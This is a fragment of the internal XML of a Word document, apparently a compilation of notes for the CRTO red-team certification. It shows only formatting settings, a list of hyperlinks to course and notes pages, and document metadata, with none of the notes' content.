              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1671910077">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1090128623">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1807309801">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="370308729">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="860584178">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2122215043">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="868488607">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="344403999">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="528568057">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1216938828">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="126167501">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1029725817">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1544058570">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1451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ganicsecurity.in/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://an0nud4y.com" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://training.zeropointsecurity.co.uk/courses/red-team-ops" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/0xn1k5" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://an0nud4y.notion.site/CRTO-Notes-a2a6242a4c4b4506b31f46db20155608?pvs=4" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-not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0xn1k5/Red-Teaming/blob/main/Red%20Team%20Certifications%20-%20Notes%20%26%20Cheat%20Sheets/CRTO%20-%20Notes%20%26%20Cheat%20Sheet.md" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/An0nUD4Y/CRTO-Notes" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://training.zeropointsecurity.co.uk/courses/red-team-ops" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://an0nud4y.com" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/an0nud4y" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-notes/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://m4lici0u5.com/notes/crto-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23510</Words>
  <Characters>134012</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1116</Lines>
  <Paragraphs>314</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>157208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2025-06-05T06:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-05T06:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>